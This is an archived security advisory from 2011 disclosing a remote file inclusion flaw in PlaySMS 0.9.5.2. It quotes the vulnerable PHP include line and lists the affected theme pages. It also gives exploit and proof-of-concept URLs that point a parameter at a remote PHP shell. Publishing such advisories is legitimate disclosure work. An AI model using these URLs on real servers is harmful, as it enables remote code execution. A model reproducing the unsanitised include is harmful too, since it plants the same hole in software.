PlaySMS 0.9.5.2 Remote File Inclusion

2011.09.07
Credit: NoGe
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

============================================================================================================= [o] PlaySMS <= Remote File Inclusion Vulnerability Software : PlaySMS ver 0.9.5.2 Vendor : http://playsms.org/ Author : NoGe Contact : noge[dot]code[at]gmail[dot]com Blog : http://evilc0de.blogspot.com/ ============================================================================================================= [o] Vulnerability <?php include $apps_path['themes']."/".$themes_module."/header.php"; ?> affected all this files web/plugin/themes/default/page_forgot.php web/plugin/themes/default/page_login.php web/plugin/themes/default/page_noaccess.php web/plugin/themes/default/page_register.php web/plugin/themes/km2/page_noaccess.php web/plugin/themes/work2/page_forgot.php web/plugin/themes/work2/page_login.php web/plugin/themes/work2/page_noaccess.php web/plugin/themes/work2/page_register.php [o] Exploit http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=[RFI] [o] PoC http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=http://phpshell? ============================================================================================================= [o] Greetz Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory aJe kaka11 matthews wishnusakti inc0mp13te martfella pizzyroot Genex H312Y noname tukulesto }^-^{ ============================================================================================================= [o] September 05 2011 - Papua, Indonesia


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top